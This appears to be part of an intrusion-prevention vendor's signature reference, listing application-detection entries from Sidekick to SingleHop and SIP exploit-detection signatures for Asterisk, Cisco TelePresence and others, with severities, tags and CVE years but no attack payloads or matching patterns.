First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sidekick is service that provides email facilities, including insights, email tracking, and email scheduling for users.
Back to top

Siemens

About this situation: Application Siemens detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Siemens is a engineering and electronics company involved in the fields of industry, energy, transportation and healthcare. It offers automation and drives, industrial solutions and services, transportation systems, building technologies and lighting solutions.
Back to top

Sierra-Wireless

About this situation: Application Sierra-Wireless detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sierra Wireless sells mobile computing and machine-to-machine
Back to top

Sifter

About this situation: Application Sifter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sifter is a simple bug and issue tracker designed to be easy enough for non-technical team members to help track bugs and issues. Integrates with GitHub, Beanstalk, and Bitbucket.
Back to top

SigBuzz

About this situation: Application SigBuzz detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SigBuzz is an Email Signature Marketing tool that enables Enterprises to standardize and deploy professional email signatures across a whole company.
Back to top

Sigcheck.exe

About this situation: Endpoint Context Agent based sigcheck.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection launched by the Windows system process sigcheck.exe was detected. Sigcheck.exe is a command line tool which shows file details.
Back to top

Sight-Max

About this situation: Application Sight-Max detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Live chat allows website visitors to interact with customer service representatives for sales and support in real time. Improve customer service satisfaction and increase online sales conversions.
Back to top

SightMaker

About this situation: Application SightMaker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SightMaker is a browser-based, PC and Mac compatible, automatic ecommerce website maker requiring no technical expertise.
Back to top

Sigma

About this situation: Application Sigma detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The SIGMA Group specializes in publishing software, integration and outsourcing.
Back to top

Sign-Up-Genuis

About this situation: Application Sign-Up-Genuis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SignUpGenius is online tool for creating and managing group sign up lists and forms.
Back to top

Signal

About this situation: Signal usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-721-5211
Last changed: sgpkg-ips-1182-5242
Description: Signal is an open source private messenger. It can be used to send and receive encrypted messages, phone calls and attachments.
Back to top

SignalMind-(formerly-piJnz)

About this situation: Application SignalMind-(formerly-piJnz) detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SignalMind (formerly known as 'PiJnz') is the online platform used by hundreds of agencies and marketers to help their clients reach customers at the right place and time.
Back to top

Signavio

About this situation: Application Signavio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Signavio is a software vendor in the Business Process Management (BPM) space. Its main product, the Signavio Process Editor is a web-based business process modeling tool
Back to top

Signiant-File-Sharing

About this situation: Signiant File Sharing usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-629-5211
Description: This service combines online file sharing with the power of accelerated file transfer and centralized, enterprise-class management for the needs of end users, operations and IT.
Back to top

SignNow

About this situation: SignNow usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-630-5211
Description: SignNow is a cloud-based electronic signature service which allows users to electronically sign, send and manage documents online, provided by the Barracuda company.
Back to top

SIHClient

About this situation: Endpoint Context Agent based sihclient.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: SIHClient endpoint application was detected. SIHClient is the Silent Install Helper Client, which is used by Windows Update.
Back to top

Silk

About this situation: Application Silk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Silk is a data publishing platform.
Back to top

SilkRoad

About this situation: Application SilkRoad detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SilkRoad is a provider of cloud-based, end-to-end HR solutions that enable customers to find, attract, develops, and retain the best talent possible.
Back to top

SilverStripe

About this situation: Application SilverStripe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SilverStripe creates websites and applications that help clients run their business. Sites are built using open source SilverStripe Content Management System
Back to top

Simcorp

About this situation: Application Simcorp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SimCorp is a provider of investment management solutions and services for the global financial services industry. Through development and implementation of its market financial software solutions, SimCorp Dimension and SimCorp Coric, SimCorp enables global investment management organisations to mitigate risk, reduce cost and enable growth.
Back to top

Simple

About this situation: Application Simple detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Simple offers a bank account that has all the tools you need to manage your money built right in.
Back to top

Simple-Sales-Tracking

About this situation: Simple Sales Tracking usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This web CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Simple-site

About this situation: Application Simple-site detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SimpleSite is a website building tool focused on absolute simplicity and maximum usability for people with no tech or design skills.
Back to top

SimpleECM

About this situation: Application SimpleECM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The SimpleECM is an API platform that enables developers to integrate document management and workflow capabilities into their applications.
Back to top

SimpleFeedback

About this situation: Application SimpleFeedback detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Customer Feedback Form - SimpleFeedback.com is a web-based service which provides customer feedback management and a feedback form on your website, wordpress blog, and mobile iOS application.
Back to top

SimpleKPI

About this situation: Application SimpleKPI detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: KPI Software provides suite of instruments for create, monitor, and manage key performance indicators for your company.
Back to top

Simplenote

About this situation: simplenote usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-629-5211
Description: The application allows users to write and share notes, ideas, and lists on computers and mobile devices. Source: Wikipedia
Back to top

SimplePay.ca

About this situation: Application SimplePay.ca detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SimplePay offers web-based payroll management solution devised for the Canadian market.
Back to top

Simplicant

About this situation: Simplicant usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Simplicant is a next generation, cloud-based talent acquisition and recruitment management platform to target and effectively engage talent. Our elegantly designed web-based functionality helps companies optimize the speed and cost per hire.
Back to top

Simplifi-Compliance

About this situation: Application Simplifi-Compliance detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Simplifi specializes in Testing Services, Application development, e-business solutions and IT-consulting.
Back to top

Simplified-Aircraft-Maintenance

About this situation: Application Simplified-Aircraft-Maintenance detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Airline Software Applications is a sofrware company, which creates aircraft maintenance solutions.
Back to top

SimpliField

About this situation: Application SimpliField detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SimpliField gives brands and retailers unprecedented visibility and insights into their retail execution performance.
Back to top

Simplify

About this situation: simplify usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description: File-sharing software for photos and music that uses popular programs like iTunes, iPhoto and Windows Media player; source Simplify Media
Back to top

Simplton

About this situation: Application Simplton detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Simplton - small town values bug and issue tracker
Back to top

Simply-Hired

About this situation: Application Simply-Hired detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Simply Hired is an employment website for job listings and online recruitment advertising network. The company aggregates job listings from thousands of sites across the Web including job boards, newspaper and classified listings, associations, social networks, content sites and company career sites.
Back to top

Simply-Measured

About this situation: Application Simply-Measured detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Simply Measured's social media analytics provides in-depth measurement and reporting across Facebook, Twitter, Instagram, YouTube and more.
Back to top

Simply-Safety!

About this situation: Application Simply-Safety! detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Simply Safety software is an easy-to-use safety management application that helps your safety team manage people, safety, and training.
Back to top

Simply-Static

About this situation: Simply Static usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-602-5211
Description: Simply Static is a web advertising and statistic collection service.
Back to top

Simplybill

About this situation: SimplyBill usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Simplybill is a web based invoicing tool that lets you create an invoice, send and track it. Create invoices for your time, or the services you offer or both. Send Thank You notes when clients pay, and reminders when they are overdue.
Back to top

SimplyBook.me

About this situation: Application SimplyBook.me detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SimplyBook.me offers an online booking system with reminders for medical services, beauty salons, event planners etc.
Back to top

SimplyCast

About this situation: Application SimplyCast detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SimplyCast is a customer communication suite for inbound marketing, marketing automation and multi-channel communication
Back to top

simplyCT

About this situation: Application simplyCT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: simplyCT - a virtual cloud based solution that transforms call centers into contact centers, enables any business to enjoy the benefits of scalable and reliable call center platform based on a pay as you grow pricing model.
Back to top

Simplyvoting

About this situation: Application Simplyvoting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Simply Voting is a full-service provider of secure, hosted online elections.
Back to top

simPRO-Enterprise

About this situation: Application simPRO-Enterprise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: simPRO Enterprise is a feature-rich business management tool. The software has been designed for the trade and service industry.
Back to top

Sina

About this situation: Sina usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-944-5242
Description: This site provides users with Internet services including news, entertainment, SMS, mail, search, games, and blogs. Source: Wikipedia
Back to top

Sina-UC

About this situation: Sina UC usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1096-5242
Description: Sina UC is a proprietary instant messaging program from Sina corporation. It has a variety of features, such as instant messaging, file transfer, audio & video conversation, web disk, game, radio, weibo, map etc.
Back to top

Sina-Weibo

About this situation: Sina Weibo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-1238-5242
Description: Sina Weibo is a free Chinese social networking and micro-blogging service.
Back to top

Sina-Weibo-Posting

About this situation: Sina Weibo posting detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-1238-5242
Description: Sina Weibo is a free Chinese social networking and micro-blogging service. This application detects posting to the service, such as blog publishing, commenting, and photo/video uploads.
Back to top

SingleHop

About this situation: Application SingleHop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SingleHop is provider of hosted private cloud and on-demand servers.
Back to top

Sinkhole

About this situation: Sinkhole IP List matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Potential Compromise
First detected in: sgpkg-ips-1731-5242
Last changed: sgpkg-ips-1731-5242
Description: A situation to match known Forcepoint Drop IP Addresses. The IP list is not a proper replacement for a URL reputation service.
Back to top

SIP

About this situation: SIP traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1511-5242
Description: SIP is a signalling protocol used for creating and controlling sessions (such as audio and video calls) over IP.
Back to top

SIP-TCP_Cisco-TelePresence-HTML-Injection-And-Memory-Corruption-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Cisco TelePresence detected
Context: SIP TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco TelePresence, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-581-5211
Vulnerability: Cisco-TelePresence-HTML-Injection-And-Memory-Corruption-Vulnerabilities
Description:
Back to top

SIP-TCP_CS-Digium-Asterisk-File-Descriptor-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: SIP TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-574-5211
Vulnerability: Digium-Asterisk-File-Descriptor-Denial-Of-Service
Description:
Back to top

SIP-TCP_CS-Digium-Asterisk-Multiple-SDP-Parameters-Parsing-Buffer-Overflow-2

About this situation: Detects SIP messages containing large input to certain SDP parameters
Context: SIP TCP Client Stream
Severity: 7
Tags: Linux, Any Hardware, Digium Asterisk, CVE2007, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-426-4219
Vulnerability: SIP-Digium-Asterisk-Multiple-SDP-Parameters-Parsing-Buffer-Overflow
Description:
Back to top

SIP-TCP_CS-Digium-Asterisk-SIP-SDP-Header-Parsing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: SIP TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-520-5211
Vulnerability: Digium-Asterisk-SIP-SDP-Header-Parsing-Stack-Buffer-Overflow
Description:
Back to top

SIP-TCP_CS-Digium-Asterisk-SIP-Sscanf-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk detected
Context: SIP TCP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2009, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Digium-Asterisk-SIP-Sscanf-Denial-Of-Service
Description:
Back to top

SIP-TCP_Grandstream-GXV-3000-SIP-Phone-Remote-Eavesdropping

About this situation: An attempt to exploit a vulnerability in Grandstream GXV-3000 SIP Phone detected
Context: SIP TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Grandstream GXV-3000 SIP Phone, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-587-5211
Vulnerability: Grandstream-GXV-3000-SIP-Phone-Remote-Eavesdropping
Description:
Back to top

SIP-TCP_IBM-Lotus-Sametime-DoS

About this situation: An attempt to exploit a IBM Lotus Sametime DoS vulnerability detected.
Context: SIP TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Lotus Sametime, CVE2013, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-700-5211
Vulnerability: IBM-Lotus-Sametime-DoS
Description:
Back to top

SIP-TCP_Malicious-Request

About this situation: An attempt to exploit a vulnerability
Context: SIP TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-605-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

SIP-TCP_Non-SIP-Protocol-Seen-In-SIP-Port

About this situation: An attempt to send non-SIP data to SIP port has been detected.
Context: SIP TCP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1318-5242
Last changed: sgpkg-ips-1322-5242
Description:
Back to top

SIP-TCP_TLS-Traffic-In-SIP-Module

About this situation: An attempt to establish a TLS connection to the port 5060
Context: SIP TCP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1200-5242
Description:
Back to top

SIP-UDP_AIM-Triton-CSeq-Buffer-Overflow

About this situation: An attempt to exploit an AIM Triton CSeq Buffer Overflow vulnerability detected.
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, AOL AIM Triton, CVE2006, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-734-5211
Last changed: sgpkg-ips-740-5211
Vulnerability: AIM-Triton-CSeq-Buffer-Overflow
Description:
Back to top

SIP-UDP_Asterisk-pjsip-Endpoint-Presence-Disclosure

About this situation: An attempt to exploit a vulnerability in Asterisk Open Source detected
Context: SIP UDP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk Open Source, Digium Certified Asterisk, CVE2018, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Asterisk-pjsip-Endpoint-Presence-Disclosure
Description:
Back to top

SIP-UDP_Asterisk-SIP-Channel-Driver-Remote-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Vulnerability: Asterisk-SIP-Channel-Driver-Remote-Denial-Of-Service
Description:
Back to top

SIP-UDP_Asterisk-SIP-Invite-Malformed-SDP-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2007, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Vulnerability: Asterisk-SIP-Invite-Malformed-SDP-Denial-of-Service
Description:
Back to top

SIP-UDP_Cisco-TelePresence-HTML-Injection-And-Memory-Corruption-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Cisco TelePresence detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco TelePresence, CVE2011, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-581-5211
Vulnerability: Cisco-TelePresence-HTML-Injection-And-Memory-Corruption-Vulnerabilities
Description:
Back to top

SIP-UDP_Cross-Site-Script-Encoder

About this situation: Generic XSS Encoder detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-791-5211
Last changed: sgpkg-ips-791-5211
Vulnerability: Cross-Site-Script-Encoder
Description:
Back to top

SIP-UDP_CS-Digium-Asterisk-File-Descriptor-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2014, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-574-5211
Vulnerability: Digium-Asterisk-File-Descriptor-Denial-Of-Service
Description:
Back to top

SIP-UDP_CS-Digium-Asterisk-Invalid-RTP-Payload-Type-Number-Memory-Corruption

About this situation: Detected an attempt to exploit a memory corruption vulnerability in Digium Asterisk detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2008, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Vulnerability: SIP-Digium-Asterisk-Invalid-RTP-Payload-Type-Number-Memory-Corruption
Description:
Back to top

SIP-UDP_CS-Digium-Asterisk-Multiple-SDP-Parameters-Parsing-Buffer-Overflow-2

About this situation: Detects SIP messages containing large input to certain SDP parameters
Context: SIP UDP Client Stream
Severity: 7
Tags: Linux, Any Hardware, Digium Asterisk, CVE2007, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-426-4219
Vulnerability: SIP-Digium-Asterisk-Multiple-SDP-Parameters-Parsing-Buffer-Overflow
Description:
Back to top

SIP-UDP_CS-Digium-Asterisk-SIP-Invalid-Response-Code-Denial-Of-Service

About this situation: Denial of service exploit against Digium Asterisk detected
Context: SIP UDP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2007, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-146-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Digium-Asterisk-SIP-Invalid-Response-Code-Denial-Of-Service
Description:
Back to top

SIP-UDP_CS-Digium-Asterisk-SIP-SDP-Header-Parsing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2013, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-520-5211
Vulnerability: Digium-Asterisk-SIP-SDP-Header-Parsing-Stack-Buffer-Overflow
Description:
Back to top

SIP-UDP_CS-Ethereal-SIP-BOF

About this situation: Attempt to exploit buffer overflow vulnerability in Ethereal SIP dissector
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, x86, Ethereal, CVE2005, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-146-2032
Last changed: sgpkg-ips-158-2032
Vulnerability: Ethereal-Multiple-Protocol-Dissector-Buffer-Overflows
Description:
Back to top

SIP-UDP_CS-Invite-Message-With-Broken-IP-Addresses

About this situation: Detects SIP INVITE messages with malformed IP addressess
Context: SIP UDP Client Stream
Severity: 2
Tags: Cisco, Any Hardware, CVE2007, Cisco not specific, Potential Denial of Service
First detected in: sgpkg-ips-146-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: SIP-Cisco-IP-Phone-Invite-IP-Address-Denial-Of-Service
Description:
Back to top

SIP-UDP_CS-Malicious-Request

About this situation: Detects SIP messages containing malicious arguments
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-498-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

SIP-UDP_Digium-Asterisk-App_Minivm-Caller-Id-Command-Execution

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2017, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-1748-5242
Vulnerability: Digium-Asterisk-App_Minivm-Caller-Id-Command-Execution
Description:
Back to top

SIP-UDP_Digium-Asterisk-Non-SIP-Uris-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-988-5242
Vulnerability: Digium-Asterisk-Non-SIP-Uris-Denial-Of-Service
Description:
Back to top

SIP-UDP_Digium-Asterisk-pjsip-Channel-Driver-Register-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-759-5211
Last changed: sgpkg-ips-759-5211
Vulnerability: Digium-Asterisk-pjsip-Channel-Driver-Register-Denial-Of-Service
Description:
Back to top

SIP-UDP_Digium-Asterisk-pjsip-Stack-ACK-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-842-5242
Vulnerability: Digium-Asterisk-pjsip-Stack-ACK-Denial-Of-Service
Description:
Back to top

SIP-UDP_Digium-Asterisk-pjsip_Multipart_Parse-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk detected
Context: SIP UDP Client Stream
Severity: 7
